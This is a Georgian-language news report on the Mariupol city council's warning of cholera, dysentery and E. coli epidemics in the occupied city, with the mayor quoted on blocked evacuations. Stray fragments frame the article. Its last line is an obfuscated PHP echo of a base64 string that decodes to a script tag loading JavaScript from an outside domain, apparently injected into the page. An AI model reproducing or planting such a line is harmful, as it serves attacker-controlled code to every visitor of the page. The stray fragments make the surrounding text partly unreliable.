celsiusi
ავერსი შნაიდერი
მარიუპოლი ეპიდემიების მიმართ დაუცველია იმის გათვალისწინებით, რომ სანიტარული პირობები შემაძრწუნებელია და ათასობით ადამიანი ნანგრევებშია მოყოლილი, ამის შესახებ ინფორმაციას მარიუპოლის საკრებულო ავრცელებს. 
 
საკრებულოს განმარტებით, კერძოდ, არსებობს ქოლერის, დიზენტერიისა და ნაწლავის ჩხირის გავრცელების საშიშროება.
 
მათივე ინფორმაციით, მოსახლეობას აუტანელ პირობებში უწევს ცხოვრება, რომელიც, ტემპერატურის მატებასთან ერთად კიდევ უფრო უარესება.
 
„ჰაერის ტემპერატურამ უკვე 20 გრადუსს მიაღწია. ასე რომ, ძლიერი და მომაკვდინებელი ეპიდემიები შეიძლება მალე გავრცელდეს ქალაქში - ცენტრალიზებული წყალმომარაგებისა და სანიტარული სისტემის არარსებობის, ნანგრევების ქვეშ ათასობით გვამის ხრწნის და სასმელი წყლისა და საკვების კატასტროფული დეფიციტის გამო,“- აცხადებენ საკრებულოში.
 
მარიუპოლის მერის, ვადიმ ბოიჩენკოს თქმით, ოკუპანტები ვერ უზრუნველყოფენ მოსახლეობას საკვებით, წყლით და მედიკამენტებით, ან უბრალოდ არ არიან დაინტერესებული ამით.
 
„ისინი ბლოკავენ ევაკუაციის ყველა მცდელობას. ამის გარეშე ხალხი დაიღუპება. საჭიროა სასწრაფო და სრული ევაკუაცია“,- აღნიშნა მერმა.
 
760
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");